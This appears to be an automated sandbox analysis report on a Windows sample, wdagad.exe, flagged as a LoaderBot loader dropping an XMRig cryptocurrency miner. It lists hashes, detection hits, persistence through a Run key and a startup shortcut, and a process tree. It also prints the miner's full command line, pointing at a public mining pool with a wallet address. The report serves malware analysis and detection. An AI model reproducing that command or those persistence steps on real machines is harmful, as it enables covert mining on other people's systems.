Analysis
-
max time kernel
53s -
max time network
141s -
platform
windows10-2004_x64 -
resource
win10v2004-20230621-en -
resource tags
arch:x64arch:x86image:win10v2004-20230621-enlocale:en-usos:windows10-2004-x64system -
submitted
30-06-2023 12:05
Static task
static1
Behavioral task
behavioral1
Sample
wdagad.exe
Resource
win7-20230621-en
Behavioral task
behavioral2
Sample
wdagad.exe
Resource
win10v2004-20230621-en
General
-
Target
wdagad.exe
-
Size
2.1MB
-
MD5
79931719ae9c21e1d8c5f1a419e85f71
-
SHA1
d4c5bdc3d4a0f2e9ca5f6e9407b837dea75c8edd
-
SHA256
f1e4bb232f6e5e0bcfb68627aea7b09b114e8f6d15a57a6e2e938db455d768bb
-
SHA512
e71ee3950f025f4aa0727a52b4493d9c57671bd73b3ae9309983229071c1812d2b9801067a0e80fa04dddc5e13e3dfdb223f07c75ab7757f296f79db7bad986f
-
SSDEEP
49152:ABRj0wlUtbZqxNwv6MitufUjzmTL7oG34n0FBhlT:at0wlUxgGqzULEGgi
Malware Config
Signatures
-
LoaderBot executable 4 IoCs
resource yara_rule behavioral2/files/0x00070000000231ce-147.dat loaderbot behavioral2/files/0x00070000000231ce-153.dat loaderbot behavioral2/files/0x00070000000231ce-154.dat loaderbot behavioral2/memory/432-155-0x0000000000E80000-0x000000000127E000-memory.dmp loaderbot -
XMRig Miner payload 20 IoCs
resource yara_rule behavioral2/memory/3728-171-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/1944-175-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/1944-178-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/1944-179-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/1944-182-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/1944-183-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/1340-188-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/1340-189-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/1340-190-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/1340-191-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/1340-194-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/1340-197-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/1340-198-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/1340-199-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/1340-200-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/1340-201-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/1340-202-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/4272-207-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/4272-208-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/4272-209-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-508929744-1894537824-211734425-1000\Control Panel\International\Geo\Nation wdagad.exe Key value queried \REGISTRY\USER\S-1-5-21-508929744-1894537824-211734425-1000\Control Panel\International\Geo\Nation work.exe Key value queried \REGISTRY\USER\S-1-5-21-508929744-1894537824-211734425-1000\Control Panel\International\Geo\Nation fesa.exe -
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Driver.url fesa.exe -
Executes dropped EXE 5 IoCs
pid Process 4368 work.exe 432 fesa.exe 3728 Driver.exe 1944 Driver.exe 1340 Driver.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-508929744-1894537824-211734425-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Driver = "C:\\Users\\Admin\\AppData\\Roaming\\Sysfiles\\fesa.exe" fesa.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 3 IoCs
pid pid_target Process procid_target 4936 3728 WerFault.exe 90 380 1944 WerFault.exe 94 4864 1340 WerFault.exe 101 -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 432 fesa.exe 432 fesa.exe 432 fesa.exe 432 fesa.exe 432 fesa.exe 432 fesa.exe 432 fesa.exe 432 fesa.exe 432 fesa.exe 432 fesa.exe 432 fesa.exe 432 fesa.exe 432 fesa.exe 432 fesa.exe 432 fesa.exe 432 fesa.exe 432 fesa.exe 432 fesa.exe 432 fesa.exe 432 fesa.exe 432 fesa.exe 432 fesa.exe 432 fesa.exe 432 fesa.exe 432 fesa.exe 432 fesa.exe 432 fesa.exe 432 fesa.exe 432 fesa.exe 432 fesa.exe 432 fesa.exe 432 fesa.exe 432 fesa.exe 432 fesa.exe 432 fesa.exe 432 fesa.exe 432 fesa.exe 432 fesa.exe 432 fesa.exe 432 fesa.exe 432 fesa.exe 432 fesa.exe 432 fesa.exe 432 fesa.exe 432 fesa.exe 432 fesa.exe 432 fesa.exe 432 fesa.exe 432 fesa.exe 432 fesa.exe 432 fesa.exe 432 fesa.exe 432 fesa.exe 432 fesa.exe 432 fesa.exe 432 fesa.exe 432 fesa.exe 432 fesa.exe 432 fesa.exe 432 fesa.exe 432 fesa.exe 432 fesa.exe 432 fesa.exe 432 fesa.exe -
Suspicious behavior: LoadsDriver 2 IoCs
pid Process 652 Process not Found 652 Process not Found -
Suspicious use of AdjustPrivilegeToken 7 IoCs
description pid Process Token: SeDebugPrivilege 432 fesa.exe Token: SeLockMemoryPrivilege 3728 Driver.exe Token: SeLockMemoryPrivilege 3728 Driver.exe Token: SeLockMemoryPrivilege 1944 Driver.exe Token: SeLockMemoryPrivilege 1944 Driver.exe Token: SeLockMemoryPrivilege 1340 Driver.exe Token: SeLockMemoryPrivilege 1340 Driver.exe -
Suspicious use of WriteProcessMemory 15 IoCs
description pid Process procid_target PID 2724 wrote to memory of 4716 2724 wdagad.exe 84 PID 2724 wrote to memory of 4716 2724 wdagad.exe 84 PID 2724 wrote to memory of 4716 2724 wdagad.exe 84 PID 4716 wrote to memory of 4368 4716 cmd.exe 87 PID 4716 wrote to memory of 4368 4716 cmd.exe 87 PID 4716 wrote to memory of 4368 4716 cmd.exe 87 PID 4368 wrote to memory of 432 4368 work.exe 88 PID 4368 wrote to memory of 432 4368 work.exe 88 PID 4368 wrote to memory of 432 4368 work.exe 88 PID 432 wrote to memory of 3728 432 fesa.exe 90 PID 432 wrote to memory of 3728 432 fesa.exe 90 PID 432 wrote to memory of 1944 432 fesa.exe 94 PID 432 wrote to memory of 1944 432 fesa.exe 94 PID 432 wrote to memory of 1340 432 fesa.exe 101 PID 432 wrote to memory of 1340 432 fesa.exe 101
Processes
-
C:\Users\Admin\AppData\Local\Temp\wdagad.exe"C:\Users\Admin\AppData\Local\Temp\wdagad.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2724 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\1.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:4716 -
C:\Users\Admin\AppData\Local\Temp\RarSFX0\work.exework.exe -priverdD3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4368 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\fesa.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\fesa.exe"4⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:432 -
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 427X8guX5JRRGk4v7gRcwK85MwpjCAN7djGqBAbCETdqc5biVY27pePT3Ctx43QMLAdKAaRDF4KW4HiozmdQ7EHrNczdnfM -p x -k -v=0 --donate-level=1 -t 25⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3728 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3728 -s 7606⤵
- Program crash
PID:4936
-
-
-
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 427X8guX5JRRGk4v7gRcwK85MwpjCAN7djGqBAbCETdqc5biVY27pePT3Ctx43QMLAdKAaRDF4KW4HiozmdQ7EHrNczdnfM -p x -k -v=0 --donate-level=1 -t 25⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1944 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1944 -s 8646⤵
- Program crash
PID:380
-
-
-
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 427X8guX5JRRGk4v7gRcwK85MwpjCAN7djGqBAbCETdqc5biVY27pePT3Ctx43QMLAdKAaRDF4KW4HiozmdQ7EHrNczdnfM -p x -k -v=0 --donate-level=1 -t 25⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1340 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1340 -s 6446⤵
- Program crash
PID:4864
-
-
-
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 427X8guX5JRRGk4v7gRcwK85MwpjCAN7djGqBAbCETdqc5biVY27pePT3Ctx43QMLAdKAaRDF4KW4HiozmdQ7EHrNczdnfM -p x -k -v=0 --donate-level=1 -t 25⤵PID:4272
-
-
-
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 448 -p 3728 -ip 37281⤵PID:1128
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 484 -p 1944 -ip 19441⤵PID:404
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 444 -p 1340 -ip 13401⤵PID:4144
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
35B
MD5ff59d999beb970447667695ce3273f75
SHA1316fa09f467ba90ac34a054daf2e92e6e2854ff8
SHA256065d2b17ad499587dc9de7ee9ecda4938b45da1df388bc72e6627dff220f64d2
SHA512d5ac72cb065a3cd3cb118a69a2f356314eeed24dcb4880751e1a3683895e66cedc62607967e29f77a0c27adf1c9fe0efd86e804f693f0a63a5b51b0bf0056b5d
-
Filesize
1.9MB
MD5636373768d83d47a8469e19e7c364cba
SHA19a0af5c6a5af766c45d2d318727843f4909bf35f
SHA2560af038a51b667ec95cac7ebd4a4c04b5011c451e211c34cb1c918891e955268a
SHA5121f8d81b4463a0533d1e264cd946f5de8c7e5c584c9ac2ff63f23e3bd7c235abdc3f4a547059e71d362540bfbcedfb35bbcd558d83baa1daa675be059d34140f6
-
Filesize
1.9MB
MD5636373768d83d47a8469e19e7c364cba
SHA19a0af5c6a5af766c45d2d318727843f4909bf35f
SHA2560af038a51b667ec95cac7ebd4a4c04b5011c451e211c34cb1c918891e955268a
SHA5121f8d81b4463a0533d1e264cd946f5de8c7e5c584c9ac2ff63f23e3bd7c235abdc3f4a547059e71d362540bfbcedfb35bbcd558d83baa1daa675be059d34140f6
-
Filesize
4.0MB
MD533b4baef7b0a6ad57a7d30af324c4efd
SHA1b169a559615a8448d7ed7da56d36a6850d2092e2
SHA2563a48d4a5106dd9ba74e5fccfe58bf65581ee894d7f3ca1b15e6680fc912cd150
SHA512739759d92a9e48e41b0366104ac9edf469cd8f323bbef0b507e3351cf081869ed069b88927fa70329d655012702385a74686df921a62dba95d7ec138a1e46690
-
Filesize
4.0MB
MD533b4baef7b0a6ad57a7d30af324c4efd
SHA1b169a559615a8448d7ed7da56d36a6850d2092e2
SHA2563a48d4a5106dd9ba74e5fccfe58bf65581ee894d7f3ca1b15e6680fc912cd150
SHA512739759d92a9e48e41b0366104ac9edf469cd8f323bbef0b507e3351cf081869ed069b88927fa70329d655012702385a74686df921a62dba95d7ec138a1e46690
-
Filesize
4.0MB
MD533b4baef7b0a6ad57a7d30af324c4efd
SHA1b169a559615a8448d7ed7da56d36a6850d2092e2
SHA2563a48d4a5106dd9ba74e5fccfe58bf65581ee894d7f3ca1b15e6680fc912cd150
SHA512739759d92a9e48e41b0366104ac9edf469cd8f323bbef0b507e3351cf081869ed069b88927fa70329d655012702385a74686df921a62dba95d7ec138a1e46690
-
Filesize
3.9MB
MD502569a7a91a71133d4a1023bf32aa6f4
SHA10f16bcb3f3f085d3d3be912195558e9f9680d574
SHA2568d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0
SHA512534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322
-
Filesize
3.9MB
MD502569a7a91a71133d4a1023bf32aa6f4
SHA10f16bcb3f3f085d3d3be912195558e9f9680d574
SHA2568d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0
SHA512534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322
-
Filesize
3.9MB
MD502569a7a91a71133d4a1023bf32aa6f4
SHA10f16bcb3f3f085d3d3be912195558e9f9680d574
SHA2568d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0
SHA512534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322
-
Filesize
3.9MB
MD502569a7a91a71133d4a1023bf32aa6f4
SHA10f16bcb3f3f085d3d3be912195558e9f9680d574
SHA2568d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0
SHA512534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322
-
Filesize
3.9MB
MD502569a7a91a71133d4a1023bf32aa6f4
SHA10f16bcb3f3f085d3d3be912195558e9f9680d574
SHA2568d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0
SHA512534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322
-
Filesize
3.9MB
MD502569a7a91a71133d4a1023bf32aa6f4
SHA10f16bcb3f3f085d3d3be912195558e9f9680d574
SHA2568d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0
SHA512534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322